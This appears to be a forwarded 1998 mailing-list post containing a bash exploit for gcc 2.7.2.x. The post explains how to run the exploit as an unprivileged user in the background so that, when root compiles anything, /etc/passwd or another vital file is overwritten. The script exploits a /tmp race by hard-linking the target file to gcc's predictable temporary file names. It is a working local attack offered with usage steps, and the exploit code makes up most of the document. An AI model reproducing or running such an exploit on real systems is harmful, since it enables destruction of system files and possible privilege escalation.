--begin gcc-exploit-2--
Try this. Launch it as a unprivledged user in background (screen?), then,
as a root, try to compile any file or project using gcc (eg. typical
daemon, service, client), and watch out your /etc/passwd (or any other
vital file, eg. /dev/kmem, /dev/hda). Attached exploit is an improved
version of that one I previously posted onto BUGTRAQ (yesterday).
It's also possible to overwrite other user's files (if only he/she
uses gcc occassionally), system logs etc.
Vunerable platforms: any running gcc 2.7.2.x
Compromise: overwriting files, maybe root; exploitable locally.
-- cut here --
#!/bin/bash
# [ http://www.rootshell.com ] 1/16/98
# Simple GCC exploit (tested under 2.7.2.3.f.1)
# - by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------
# Usage: "screen ./gcc_ln" then Ctrl+A,D
# ---------------------------------------------
# Ugh, blah... Should be written in C for
# better performance, but I have no time :)
VICTIM=/etc/passwd
if [ ! -f $VICTIM ]; then
echo "I can't see my victim ($VICTIM)..."
exit 0
fi
ORIG=`ls -l $VICTIM|awk '{print \$5}'`
echo "GCC exploit launched against $VICTIM ($ORIG bytes)."
renice +20 $PPID >&/dev/null
cd /tmp
while [ 1 ]; do
V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
if [ ! "$V" = "" ]; then
ln $VICTIM ${V}.s &>/dev/null
ln $VICTIM ${V}1.o &>/dev/null
NOWY=`ls -l $VICTIM|awk '{print \$5}'`
if [ "$ORIG" = "$NOWY" ]; then
echo -n "."
rm -f ${V}.s ${V}1.o &>/dev/null
else
echo "Voila. I'm so smart."
rm -f ${V}.s ${V}1.o &>/dev/null
exit 0
fi
fi
done
--end gcc-exploit-2--
--Phillip R. Jaenke (prj@raex.com)
Primary Developer, The Improvement Linux Project
Core Team Member, The Cyberian RC5 Effort - http://www.cyberian.org/
AKA Kaeyerai (Rediscovery) of MasterTechnoMonster
Maintainer, The Cleveland Modem Guide - http://web.raex.com/~prj/